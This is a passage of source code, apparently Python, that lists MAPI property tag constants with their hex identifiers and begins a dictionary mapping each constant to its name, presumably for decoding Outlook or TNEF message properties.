MAPI_PREFERRED_BY_NAME = 0x3A47
MAPI_SPOUSE_NAME = 0x3A48
MAPI_COMPUTER_NETWORK_NAME = 0x3A49
MAPI_CUSTOMER_ID = 0x3A4A
MAPI_TTYTDD_PHONE_NUMBER = 0x3A4B
MAPI_FTP_SITE = 0x3A4C
MAPI_GENDER = 0x3A4D
MAPI_MANAGER_NAME = 0x3A4E
MAPI_NICKNAME = 0x3A4F
MAPI_PERSONAL_HOME_PAGE = 0x3A50
MAPI_BUSINESS_HOME_PAGE = 0x3A51
MAPI_CONTACT_VERSION = 0x3A52
MAPI_CONTACT_ENTRYIDS = 0x3A53
MAPI_CONTACT_ADDRTYPES = 0x3A54
MAPI_CONTACT_DEFAULT_ADDRESS_INDEX = 0x3A55
MAPI_CONTACT_EMAIL_ADDRESSES = 0x3A56
MAPI_COMPANY_MAIN_PHONE_NUMBER = 0x3A57
MAPI_CHILDRENS_NAMES = 0x3A58
MAPI_HOME_ADDRESS_CITY = 0x3A59
MAPI_HOME_ADDRESS_COUNTRY = 0x3A5A
MAPI_HOME_ADDRESS_POSTAL_CODE = 0x3A5B
MAPI_HOME_ADDRESS_STATE_OR_PROVINCE = 0x3A5C
MAPI_HOME_ADDRESS_STREET = 0x3A5D
MAPI_HOME_ADDRESS_POST_OFFICE_BOX = 0x3A5E
MAPI_OTHER_ADDRESS_CITY = 0x3A5F
MAPI_OTHER_ADDRESS_COUNTRY = 0x3A60
MAPI_OTHER_ADDRESS_POSTAL_CODE = 0x3A61
MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE = 0x3A62
MAPI_OTHER_ADDRESS_STREET = 0x3A63
MAPI_OTHER_ADDRESS_POST_OFFICE_BOX = 0x3A64
MAPI_STORE_PROVIDERS = 0x3D00
MAPI_AB_PROVIDERS = 0x3D01
MAPI_TRANSPORT_PROVIDERS = 0x3D02
MAPI_DEFAULT_PROFILE = 0x3D04
MAPI_AB_SEARCH_PATH = 0x3D05
MAPI_AB_DEFAULT_DIR = 0x3D06
MAPI_AB_DEFAULT_PAB = 0x3D07
MAPI_FILTERING_HOOKS = 0x3D08
MAPI_SERVICE_NAME = 0x3D09
MAPI_SERVICE_DLL_NAME = 0x3D0A
MAPI_SERVICE_ENTRY_NAME = 0x3D0B
MAPI_SERVICE_UID = 0x3D0C
MAPI_SERVICE_EXTRA_UIDS = 0x3D0D
MAPI_SERVICES = 0x3D0E
MAPI_SERVICE_SUPPORT_FILES = 0x3D0F
MAPI_SERVICE_DELETE_FILES = 0x3D10
MAPI_AB_SEARCH_PATH_UPDATE = 0x3D11
MAPI_PROFILE_NAME = 0x3D12
MAPI_IDENTITY_DISPLAY = 0x3E00
MAPI_IDENTITY_ENTRYID = 0x3E01
MAPI_RESOURCE_METHODS = 0x3E02
MAPI_RESOURCE_TYPE = 0x3E03
MAPI_STATUS_CODE = 0x3E04
MAPI_IDENTITY_SEARCH_KEY = 0x3E05
MAPI_OWN_STORE_ENTRYID = 0x3E06
MAPI_RESOURCE_PATH = 0x3E07
MAPI_STATUS_STRING = 0x3E08
MAPI_X400_DEFERRED_DELIVERY_CANCEL = 0x3E09
MAPI_HEADER_FOLDER_ENTRYID = 0x3E0A
MAPI_REMOTE_PROGRESS = 0x3E0B
MAPI_REMOTE_PROGRESS_TEXT = 0x3E0C
MAPI_REMOTE_VALIDATE_OK = 0x3E0D
MAPI_CONTROL_FLAGS = 0x3F00
MAPI_CONTROL_STRUCTURE = 0x3F01
MAPI_CONTROL_TYPE = 0x3F02
MAPI_DELTAX = 0x3F03
MAPI_DELTAY = 0x3F04
MAPI_XPOS = 0x3F05
MAPI_YPOS = 0x3F06
MAPI_CONTROL_ID = 0x3F07
MAPI_INITIAL_DETAILS_PANE = 0x3F08
MAPI_ID_SECURE_MIN = 0x67F0
MAPI_ID_SECURE_MAX = 0x67FF
codes = {
MAPI_ACKNOWLEDGEMENT_MODE : "MAPI_ACKNOWLEDGEMENT_MODE",
MAPI_ALTERNATE_RECIPIENT_ALLOWED : "MAPI_ALTERNATE_RECIPIENT_ALLOWED",
MAPI_AUTHORIZING_USERS : "MAPI_AUTHORIZING_USERS",
MAPI_AUTO_FORWARD_COMMENT : "MAPI_AUTO_FORWARD_COMMENT",
MAPI_AUTO_FORWARDED : "MAPI_AUTO_FORWARDED",
MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID : "MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID",
MAPI_CONTENT_CORRELATOR : "MAPI_CONTENT_CORRELATOR",
MAPI_CONTENT_IDENTIFIER : "MAPI_CONTENT_IDENTIFIER",
MAPI_CONTENT_LENGTH : "MAPI_CONTENT_LENGTH",
MAPI_CONTENT_RETURN_REQUESTED : "MAPI_CONTENT_RETURN_REQUESTED",
MAPI_CONVERSATION_KEY : "MAPI_CONVERSATION_KEY",
MAPI_CONVERSION_EITS : "MAPI_CONVERSION_EITS",
MAPI_CONVERSION_WITH_LOSS_PROHIBITED : "MAPI_CONVERSION_WITH_LOSS_PROHIBITED",
MAPI_CONVERTED_EITS : "MAPI_CONVERTED_EITS",
MAPI_DEFERRED_DELIVERY_TIME : "MAPI_DEFERRED_DELIVERY_TIME",
MAPI_DELIVER_TIME : "MAPI_DELIVER_TIME",
MAPI_DISCARD_REASON : "MAPI_DISCARD_REASON",
MAPI_DISCLOSURE_OF_RECIPIENTS : "MAPI_DISCLOSURE_OF_RECIPIENTS",
MAPI_DL_EXPANSION_HISTORY : "MAPI_DL_EXPANSION_HISTORY",
MAPI_DL_EXPANSION_PROHIBITED : "MAPI_DL_EXPANSION_PROHIBITED",
MAPI_EXPIRY_TIME : "MAPI_EXPIRY_TIME",
MAPI_IMPLICIT_CONVERSION_PROHIBITED : "MAPI_IMPLICIT_CONVERSION_PROHIBITED",
MAPI_IMPORTANCE : "MAPI_IMPORTANCE",
MAPI_IPM_ID : "MAPI_IPM_ID",
MAPI_LATEST_DELIVERY_TIME : "MAPI_LATEST_DELIVERY_TIME",
MAPI_MESSAGE_CLASS : "MAPI_MESSAGE_CLASS",
MAPI_MESSAGE_DELIVERY_ID : "MAPI_MESSAGE_DELIVERY_ID",
MAPI_MESSAGE_SECURITY_LABEL : "MAPI_MESSAGE_SECURITY_LABEL",
MAPI_OBSOLETED_IPMS : "MAPI_OBSOLETED_IPMS",
MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME : "MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME",
MAPI_ORIGINAL_EITS : "MAPI_ORIGINAL_EITS",
MAPI_ORIGINATOR_CERTIFICATE : "MAPI_ORIGINATOR_CERTIFICATE",
MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED : "MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED",
MAPI_ORIGINATOR_RETURN_ADDRESS : "MAPI_ORIGINATOR_RETURN_ADDRESS",
MAPI_PARENT_KEY : "MAPI_PARENT_KEY",
MAPI_PRIORITY : "MAPI_PRIORITY",
MAPI_ORIGIN_CHECK : "MAPI_ORIGIN_CHECK",
MAPI_PROOF_OF_SUBMISSION_REQUESTED : "MAPI_PROOF_OF_SUBMISSION_REQUESTED",
MAPI_READ_RECEIPT_REQUESTED : "MAPI_READ_RECEIPT_REQUESTED",
MAPI_RECEIPT_TIME : "MAPI_RECEIPT_TIME",
MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED : "MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED",
MAPI_REDIRECTION_HISTORY : "MAPI_REDIRECTION_HISTORY",
MAPI_RELATED_IPMS : "MAPI_RELATED_IPMS",
MAPI_ORIGINAL_SENSITIVITY : "MAPI_ORIGINAL_SENSITIVITY",
MAPI_LANGUAGES : "MAPI_LANGUAGES",
MAPI_REPLY_TIME : "MAPI_REPLY_TIME",
MAPI_REPORT_TAG : "MAPI_REPORT_TAG",
MAPI_REPORT_TIME : "MAPI_REPORT_TIME",
MAPI_RETURNED_IPM : "MAPI_RETURNED_IPM",
MAPI_SECURITY : "MAPI_SECURITY",
MAPI_INCOMPLETE_COPY : "MAPI_INCOMPLETE_COPY",
MAPI_SENSITIVITY : "MAPI_SENSITIVITY",
MAPI_SUBJECT : "MAPI_SUBJECT",
MAPI_SUBJECT_IPM : "MAPI_SUBJECT_IPM",
MAPI_CLIENT_SUBMIT_TIME : "MAPI_CLIENT_SUBMIT_TIME",
MAPI_REPORT_NAME : "MAPI_REPORT_NAME",
MAPI_SENT_REPRESENTING_SEARCH_KEY : "MAPI_SENT_REPRESENTING_SEARCH_KEY",
MAPI_X400_CONTENT_TYPE : "MAPI_X400_CONTENT_TYPE",
MAPI_SUBJECT_PREFIX : "MAPI_SUBJECT_PREFIX",
MAPI_NON_RECEIPT_REASON : "MAPI_NON_RECEIPT_REASON",
MAPI_RECEIVED_BY_ENTRYID : "MAPI_RECEIVED_BY_ENTRYID",
MAPI_RECEIVED_BY_NAME : "MAPI_RECEIVED_BY_NAME",
MAPI_SENT_REPRESENTING_ENTRYID : "MAPI_SENT_REPRESENTING_ENTRYID",
MAPI_SENT_REPRESENTING_NAME : "MAPI_SENT_REPRESENTING_NAME",
MAPI_RCVD_REPRESENTING_ENTRYID : "MAPI_RCVD_REPRESENTING_ENTRYID",
MAPI_RCVD_REPRESENTING_NAME : "MAPI_RCVD_REPRESENTING_NAME",
MAPI_REPORT_ENTRYID : "MAPI_REPORT_ENTRYID",
MAPI_READ_RECEIPT_ENTRYID : "MAPI_READ_RECEIPT_ENTRYID",
MAPI_MESSAGE_SUBMISSION_ID : "MAPI_MESSAGE_SUBMISSION_ID",
MAPI_PROVIDER_SUBMIT_TIME : "MAPI_PROVIDER_SUBMIT_TIME",
MAPI_ORIGINAL_SUBJECT : "MAPI_ORIGINAL_SUBJECT",
MAPI_DISC_VAL : "MAPI_DISC_VAL",
MAPI_ORIG_MESSAGE_CLASS : "MAPI_ORIG_MESSAGE_CLASS",
MAPI_ORIGINAL_AUTHOR_ENTRYID : "MAPI_ORIGINAL_AUTHOR_ENTRYID",
MAPI_ORIGINAL_AUTHOR_NAME : "MAPI_ORIGINAL_AUTHOR_NAME",
MAPI_ORIGINAL_SUBMIT_TIME : "MAPI_ORIGINAL_SUBMIT_TIME",
MAPI_REPLY_RECIPIENT_ENTRIES : "MAPI_REPLY_RECIPIENT_ENTRIES",
MAPI_REPLY_RECIPIENT_NAMES : "MAPI_REPLY_RECIPIENT_NAMES",
MAPI_RECEIVED_BY_SEARCH_KEY : "MAPI_RECEIVED_BY_SEARCH_KEY",
MAPI_RCVD_REPRESENTING_SEARCH_KEY : "MAPI_RCVD_REPRESENTING_SEARCH_KEY",
MAPI_READ_RECEIPT_SEARCH_KEY : "MAPI_READ_RECEIPT_SEARCH_KEY",
MAPI_REPORT_SEARCH_KEY : "MAPI_REPORT_SEARCH_KEY",
MAPI_ORIGINAL_DELIVERY_TIME : "MAPI_ORIGINAL_DELIVERY_TIME",
MAPI_ORIGINAL_AUTHOR_SEARCH_KEY : "MAPI_ORIGINAL_AUTHOR_SEARCH_KEY",
MAPI_MESSAGE_TO_ME : "MAPI_MESSAGE_TO_ME",
MAPI_MESSAGE_CC_ME : "MAPI_MESSAGE_CC_ME",
MAPI_MESSAGE_RECIP_ME : "MAPI_MESSAGE_RECIP_ME",
MAPI_ORIGINAL_SENDER_NAME : "MAPI_ORIGINAL_SENDER_NAME",
MAPI_ORIGINAL_SENDER_ENTRYID : "MAPI_ORIGINAL_SENDER_ENTRYID",
MAPI_ORIGINAL_SENDER_SEARCH_KEY : "MAPI_ORIGINAL_SENDER_SEARCH_KEY",
MAPI_ORIGINAL_SENT_REPRESENTING_NAME : "MAPI_ORIGINAL_SENT_REPRESENTING_NAME",
MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID : "MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID",
MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY : "MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY",
MAPI_START_DATE : "MAPI_START_DATE",
MAPI_END_DATE : "MAPI_END_DATE",
MAPI_OWNER_APPT_ID : "MAPI_OWNER_APPT_ID",
MAPI_RESPONSE_REQUESTED : "MAPI_RESPONSE_REQUESTED",
MAPI_SENT_REPRESENTING_ADDRTYPE : "MAPI_SENT_REPRESENTING_ADDRTYPE",
MAPI_SENT_REPRESENTING_EMAIL_ADDRESS : "MAPI_SENT_REPRESENTING_EMAIL_ADDRESS",
MAPI_ORIGINAL_SENDER_ADDRTYPE : "MAPI_ORIGINAL_SENDER_ADDRTYPE",
MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS : "MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS",
MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE : "MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE",
MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS : "MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS",
MAPI_CONVERSATION_TOPIC : "MAPI_CONVERSATION_TOPIC",
MAPI_CONVERSATION_INDEX : "MAPI_CONVERSATION_INDEX",
MAPI_ORIGINAL_DISPLAY_BCC : "MAPI_ORIGINAL_DISPLAY_BCC",
MAPI_ORIGINAL_DISPLAY_CC : "MAPI_ORIGINAL_DISPLAY_CC",
MAPI_ORIGINAL_DISPLAY_TO : "MAPI_ORIGINAL_DISPLAY_TO",
MAPI_RECEIVED_BY_ADDRTYPE : "MAPI_RECEIVED_BY_ADDRTYPE",
MAPI_RECEIVED_BY_EMAIL_ADDRESS : "MAPI_RECEIVED_BY_EMAIL_ADDRESS",
MAPI_RCVD_REPRESENTING_ADDRTYPE : "MAPI_RCVD_REPRESENTING_ADDRTYPE",
MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS : "MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS",
MAPI_ORIGINAL_AUTHOR_ADDRTYPE : "MAPI_ORIGINAL_AUTHOR_ADDRTYPE",
MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS : "MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS",
MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE : "MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE",
MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS : "MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS",
MAPI_TRANSPORT_MESSAGE_HEADERS : "MAPI_TRANSPORT_MESSAGE_HEADERS",
MAPI_DELEGATION : "MAPI_DELEGATION",
MAPI_TNEF_CORRELATION_KEY : "MAPI_TNEF_CORRELATION_KEY",
MAPI_BODY : "MAPI_BODY",
MAPI_BODY_HTML : "MAPI_BODY_HTML",
MAPI_REPORT_TEXT : "MAPI_REPORT_TEXT",
MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY : "MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY",
MAPI_REPORTING_DL_NAME : "MAPI_REPORTING_DL_NAME",
MAPI_REPORTING_MTA_CERTIFICATE : "MAPI_REPORTING_MTA_CERTIFICATE",
MAPI_RTF_SYNC_BODY_CRC : "MAPI_RTF_SYNC_BODY_CRC",
MAPI_RTF_SYNC_BODY_COUNT : "MAPI_RTF_SYNC_BODY_COUNT",
MAPI_RTF_SYNC_BODY_TAG : "MAPI_RTF_SYNC_BODY_TAG",
MAPI_RTF_COMPRESSED : "MAPI_RTF_COMPRESSED",
MAPI_RTF_SYNC_PREFIX_COUNT : "MAPI_RTF_SYNC_PREFIX_COUNT",
MAPI_RTF_SYNC_TRAILING_COUNT : "MAPI_RTF_SYNC_TRAILING_COUNT",
MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID : "MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID",
MAPI_CONTENT_INTEGRITY_CHECK : "MAPI_CONTENT_INTEGRITY_CHECK",
MAPI_EXPLICIT_CONVERSION : "MAPI_EXPLICIT_CONVERSION",
MAPI_IPM_RETURN_REQUESTED : "MAPI_IPM_RETURN_REQUESTED",
MAPI_MESSAGE_TOKEN : "MAPI_MESSAGE_TOKEN",
MAPI_NDR_REASON_CODE : "MAPI_NDR_REASON_CODE",
MAPI_NDR_DIAG_CODE : "MAPI_NDR_DIAG_CODE",
MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED : "MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED",
MAPI_DELIVERY_POINT : "MAPI_DELIVERY_POINT",
MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED : "MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED",
MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT : "MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT",
MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY : "MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY",
MAPI_PHYSICAL_DELIVERY_MODE : "MAPI_PHYSICAL_DELIVERY_MODE",
MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST : "MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST",
MAPI_PHYSICAL_FORWARDING_ADDRESS : "MAPI_PHYSICAL_FORWARDING_ADDRESS",
MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED : "MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED",
MAPI_PHYSICAL_FORWARDING_PROHIBITED : "MAPI_PHYSICAL_FORWARDING_PROHIBITED",
MAPI_PHYSICAL_RENDITION_ATTRIBUTES : "MAPI_PHYSICAL_RENDITION_ATTRIBUTES",
MAPI_PROOF_OF_DELIVERY : "MAPI_PROOF_OF_DELIVERY",
MAPI_PROOF_OF_DELIVERY_REQUESTED : "MAPI_PROOF_OF_DELIVERY_REQUESTED",
MAPI_RECIPIENT_CERTIFICATE : "MAPI_RECIPIENT_CERTIFICATE",
MAPI_RECIPIENT_NUMBER_FOR_ADVICE : "MAPI_RECIPIENT_NUMBER_FOR_ADVICE",
MAPI_RECIPIENT_TYPE : "MAPI_RECIPIENT_TYPE",
MAPI_REGISTERED_MAIL_TYPE : "MAPI_REGISTERED_MAIL_TYPE",
MAPI_REPLY_REQUESTED : "MAPI_REPLY_REQUESTED",
MAPI_REQUESTED_DELIVERY_METHOD : "MAPI_REQUESTED_DELIVERY_METHOD",
MAPI_SENDER_ENTRYID : "MAPI_SENDER_ENTRYID",
MAPI_SENDER_NAME : "MAPI_SENDER_NAME",
MAPI_SUPPLEMENTARY_INFO : "MAPI_SUPPLEMENTARY_INFO",
MAPI_TYPE_OF_MTS_USER : "MAPI_TYPE_OF_MTS_USER",
MAPI_SENDER_SEARCH_KEY : "MAPI_SENDER_SEARCH_KEY",
MAPI_SENDER_ADDRTYPE : "MAPI_SENDER_ADDRTYPE",
MAPI_SENDER_EMAIL_ADDRESS : "MAPI_SENDER_EMAIL_ADDRESS",
MAPI_CURRENT_VERSION : "MAPI_CURRENT_VERSION",
MAPI_DELETE_AFTER_SUBMIT : "MAPI_DELETE_AFTER_SUBMIT",
MAPI_DISPLAY_BCC : "MAPI_DISPLAY_BCC",
MAPI_DISPLAY_CC : "MAPI_DISPLAY_CC",
MAPI_DISPLAY_TO : "MAPI_DISPLAY_TO",
MAPI_PARENT_DISPLAY : "MAPI_PARENT_DISPLAY",
MAPI_MESSAGE_DELIVERY_TIME : "MAPI_MESSAGE_DELIVERY_TIME",
MAPI_MESSAGE_FLAGS : "MAPI_MESSAGE_FLAGS",
MAPI_MESSAGE_SIZE : "MAPI_MESSAGE_SIZE",
MAPI_PARENT_ENTRYID : "MAPI_PARENT_ENTRYID",
MAPI_SENTMAIL_ENTRYID : "MAPI_SENTMAIL_ENTRYID",
MAPI_CORRELATE : "MAPI_CORRELATE",
MAPI_CORRELATE_MTSID : "MAPI_CORRELATE_MTSID",
MAPI_DISCRETE_VALUES : "MAPI_DISCRETE_VALUES",
MAPI_RESPONSIBILITY : "MAPI_RESPONSIBILITY",
MAPI_SPOOLER_STATUS : "MAPI_SPOOLER_STATUS",
MAPI_TRANSPORT_STATUS : "MAPI_TRANSPORT_STATUS",
MAPI_MESSAGE_RECIPIENTS : "MAPI_MESSAGE_RECIPIENTS",
MAPI_MESSAGE_ATTACHMENTS : "MAPI_MESSAGE_ATTACHMENTS",
MAPI_SUBMIT_FLAGS : "MAPI_SUBMIT_FLAGS",
MAPI_RECIPIENT_STATUS : "MAPI_RECIPIENT_STATUS",
MAPI_TRANSPORT_KEY : "MAPI_TRANSPORT_KEY",
MAPI_MSG_STATUS : "MAPI_MSG_STATUS",
MAPI_MESSAGE_DOWNLOAD_TIME : "MAPI_MESSAGE_DOWNLOAD_TIME",
MAPI_CREATION_VERSION : "MAPI_CREATION_VERSION",
MAPI_MODIFY_VERSION : "MAPI_MODIFY_VERSION",
MAPI_HASATTACH : "MAPI_HASATTACH",
MAPI_BODY_CRC : "MAPI_BODY_CRC",
MAPI_NORMALIZED_SUBJECT : "MAPI_NORMALIZED_SUBJECT",
MAPI_RTF_IN_SYNC : "MAPI_RTF_IN_SYNC",
MAPI_ATTACH_SIZE : "MAPI_ATTACH_SIZE",
MAPI_ATTACH_NUM : "MAPI_ATTACH_NUM",
MAPI_PREPROCESS : "MAPI_PREPROCESS",
MAPI_ORIGINATING_MTA_CERTIFICATE : "MAPI_ORIGINATING_MTA_CERTIFICATE",
MAPI_PROOF_OF_SUBMISSION : "MAPI_PROOF_OF_SUBMISSION",
MAPI_ENTRYID : "MAPI_ENTRYID",
MAPI_OBJECT_TYPE : "MAPI_OBJECT_TYPE",
MAPI_ICON : "MAPI_ICON",
MAPI_MINI_ICON : "MAPI_MINI_ICON",
MAPI_STORE_ENTRYID : "MAPI_STORE_ENTRYID",
MAPI_STORE_RECORD_KEY : "MAPI_STORE_RECORD_KEY",
MAPI_RECORD_KEY : "MAPI_RECORD_KEY",
MAPI_MAPPING_SIGNATURE : "MAPI_MAPPING_SIGNATURE",
MAPI_ACCESS_LEVEL : "MAPI_ACCESS_LEVEL",
MAPI_INSTANCE_KEY : "MAPI_INSTANCE_KEY",
MAPI_ROW_TYPE : "MAPI_ROW_TYPE",
MAPI_ACCESS : "MAPI_ACCESS",
MAPI_ROWID : "MAPI_ROWID",
MAPI_DISPLAY_NAME : "MAPI_DISPLAY_NAME",
MAPI_ADDRTYPE : "MAPI_ADDRTYPE",
MAPI_EMAIL_ADDRESS : "MAPI_EMAIL_ADDRESS",
MAPI_COMMENT : "MAPI_COMMENT",
MAPI_DEPTH : "MAPI_DEPTH",
MAPI_PROVIDER_DISPLAY : "MAPI_PROVIDER_DISPLAY",
MAPI_CREATION_TIME : "MAPI_CREATION_TIME",
MAPI_LAST_MODIFICATION_TIME : "MAPI_LAST_MODIFICATION_TIME",
MAPI_RESOURCE_FLAGS : "MAPI_RESOURCE_FLAGS",
MAPI_PROVIDER_DLL_NAME : "MAPI_PROVIDER_DLL_NAME",
MAPI_SEARCH_KEY : "MAPI_SEARCH_KEY",
MAPI_PROVIDER_UID : "MAPI_PROVIDER_UID",
MAPI_PROVIDER_ORDINAL : "MAPI_PROVIDER_ORDINAL",
MAPI_FORM_VERSION : "MAPI_FORM_VERSION",
MAPI_FORM_CLSID : "MAPI_FORM_CLSID",
MAPI_FORM_CONTACT_NAME : "MAPI_FORM_CONTACT_NAME",
MAPI_FORM_CATEGORY : "MAPI_FORM_CATEGORY",
MAPI_FORM_CATEGORY_SUB : "MAPI_FORM_CATEGORY_SUB",
MAPI_FORM_HOST_MAP : "MAPI_FORM_HOST_MAP",
MAPI_FORM_HIDDEN : "MAPI_FORM_HIDDEN",
MAPI_FORM_DESIGNER_NAME : "MAPI_FORM_DESIGNER_NAME",
MAPI_FORM_DESIGNER_GUID : "MAPI_FORM_DESIGNER_GUID",
MAPI_FORM_MESSAGE_BEHAVIOR : "MAPI_FORM_MESSAGE_BEHAVIOR",
MAPI_DEFAULT_STORE : "MAPI_DEFAULT_STORE",
MAPI_STORE_SUPPORT_MASK : "MAPI_STORE_SUPPORT_MASK",
MAPI_STORE_STATE : "MAPI_STORE_STATE",
MAPI_IPM_SUBTREE_SEARCH_KEY : "MAPI_IPM_SUBTREE_SEARCH_KEY",
MAPI_IPM_OUTBOX_SEARCH_KEY : "MAPI_IPM_OUTBOX_SEARCH_KEY",
MAPI_IPM_WASTEBASKET_SEARCH_KEY : "MAPI_IPM_WASTEBASKET_SEARCH_KEY",
MAPI_IPM_SENTMAIL_SEARCH_KEY : "MAPI_IPM_SENTMAIL_SEARCH_KEY",
MAPI_MDB_PROVIDER : "MAPI_MDB_PROVIDER",
MAPI_RECEIVE_FOLDER_SETTINGS : "MAPI_RECEIVE_FOLDER_SETTINGS",
MAPI_VALID_FOLDER_MASK : "MAPI_VALID_FOLDER_MASK",
MAPI_IPM_SUBTREE_ENTRYID : "MAPI_IPM_SUBTREE_ENTRYID",
MAPI_IPM_OUTBOX_ENTRYID : "MAPI_IPM_OUTBOX_ENTRYID",
MAPI_IPM_WASTEBASKET_ENTRYID : "MAPI_IPM_WASTEBASKET_ENTRYID",
MAPI_IPM_SENTMAIL_ENTRYID : "MAPI_IPM_SENTMAIL_ENTRYID",
MAPI_VIEWS_ENTRYID : "MAPI_VIEWS_ENTRYID",
MAPI_COMMON_VIEWS_ENTRYID : "MAPI_COMMON_VIEWS_ENTRYID",
MAPI_FINDER_ENTRYID : "MAPI_FINDER_ENTRYID",
MAPI_CONTAINER_FLAGS : "MAPI_CONTAINER_FLAGS",
MAPI_FOLDER_TYPE : "MAPI_FOLDER_TYPE",
MAPI_CONTENT_COUNT : "MAPI_CONTENT_COUNT",
MAPI_CONTENT_UNREAD : "MAPI_CONTENT_UNREAD",
MAPI_CREATE_TEMPLATES : "MAPI_CREATE_TEMPLATES",
MAPI_DETAILS_TABLE : "MAPI_DETAILS_TABLE",
MAPI_SEARCH : "MAPI_SEARCH",
MAPI_SELECTABLE : "MAPI_SELECTABLE",
MAPI_SUBFOLDERS : "MAPI_SUBFOLDERS",
MAPI_STATUS : "MAPI_STATUS",
MAPI_ANR : "MAPI_ANR",
MAPI_CONTENTS_SORT_ORDER : "MAPI_CONTENTS_SORT_ORDER",
MAPI_CONTAINER_HIERARCHY : "MAPI_CONTAINER_HIERARCHY",
MAPI_CONTAINER_CONTENTS : "MAPI_CONTAINER_CONTENTS",
MAPI_FOLDER_ASSOCIATED_CONTENTS : "MAPI_FOLDER_ASSOCIATED_CONTENTS",
MAPI_DEF_CREATE_DL : "MAPI_DEF_CREATE_DL",
MAPI_DEF_CREATE_MAILUSER : "MAPI_DEF_CREATE_MAILUSER",
MAPI_CONTAINER_CLASS : "MAPI_CONTAINER_CLASS",
MAPI_CONTAINER_MODIFY_VERSION : "MAPI_CONTAINER_MODIFY_VERSION",
MAPI_AB_PROVIDER_ID : "MAPI_AB_PROVIDER_ID",
MAPI_DEFAULT_VIEW_ENTRYID : "MAPI_DEFAULT_VIEW_ENTRYID",
MAPI_ASSOC_CONTENT_COUNT : "MAPI_ASSOC_CONTENT_COUNT",
MAPI_ATTACHMENT_X400_PARAMETERS : "MAPI_ATTACHMENT_X400_PARAMETERS",
MAPI_ATTACH_DATA_OBJ : "MAPI_ATTACH_DATA_OBJ",
MAPI_ATTACH_ENCODING : "MAPI_ATTACH_ENCODING",
MAPI_ATTACH_EXTENSION : "MAPI_ATTACH_EXTENSION",
MAPI_ATTACH_FILENAME : "MAPI_ATTACH_FILENAME",
MAPI_ATTACH_METHOD : "MAPI_ATTACH_METHOD",
MAPI_ATTACH_LONG_FILENAME : "MAPI_ATTACH_LONG_FILENAME",
MAPI_ATTACH_PATHNAME : "MAPI_ATTACH_PATHNAME",
MAPI_ATTACH_RENDERING : "MAPI_ATTACH_RENDERING",
MAPI_ATTACH_TAG : "MAPI_ATTACH_TAG",
MAPI_RENDERING_POSITION : "MAPI_RENDERING_POSITION",
MAPI_ATTACH_TRANSPORT_NAME : "MAPI_ATTACH_TRANSPORT_NAME",
MAPI_ATTACH_LONG_PATHNAME : "MAPI_ATTACH_LONG_PATHNAME",
MAPI_ATTACH_MIME_TAG : "MAPI_ATTACH_MIME_TAG",
MAPI_ATTACH_ADDITIONAL_INFO : "MAPI_ATTACH_ADDITIONAL_INFO",
MAPI_DISPLAY_TYPE : "MAPI_DISPLAY_TYPE",
MAPI_TEMPLATEID : "MAPI_TEMPLATEID",
MAPI_PRIMARY_CAPABILITY : "MAPI_PRIMARY_CAPABILITY",
MAPI_7BIT_DISPLAY_NAME : "MAPI_7BIT_DISPLAY_NAME",
MAPI_ACCOUNT : "MAPI_ACCOUNT",
MAPI_ALTERNATE_RECIPIENT : "MAPI_ALTERNATE_RECIPIENT",
MAPI_CALLBACK_TELEPHONE_NUMBER : "MAPI_CALLBACK_TELEPHONE_NUMBER",
MAPI_CONVERSION_PROHIBITED : "MAPI_CONVERSION_PROHIBITED",
MAPI_DISCLOSE_RECIPIENTS : "MAPI_DISCLOSE_RECIPIENTS",
MAPI_GENERATION : "MAPI_GENERATION",
MAPI_GIVEN_NAME : "MAPI_GIVEN_NAME",
MAPI_GOVERNMENT_ID_NUMBER : "MAPI_GOVERNMENT_ID_NUMBER",
MAPI_BUSINESS_TELEPHONE_NUMBER : "MAPI_BUSINESS_TELEPHONE_NUMBER",
MAPI_HOME_TELEPHONE_NUMBER : "MAPI_HOME_TELEPHONE_NUMBER",
MAPI_INITIALS : "MAPI_INITIALS",
MAPI_KEYWORD : "MAPI_KEYWORD",
MAPI_LANGUAGE : "MAPI_LANGUAGE",
MAPI_LOCATION : "MAPI_LOCATION",
MAPI_MAIL_PERMISSION : "MAPI_MAIL_PERMISSION",
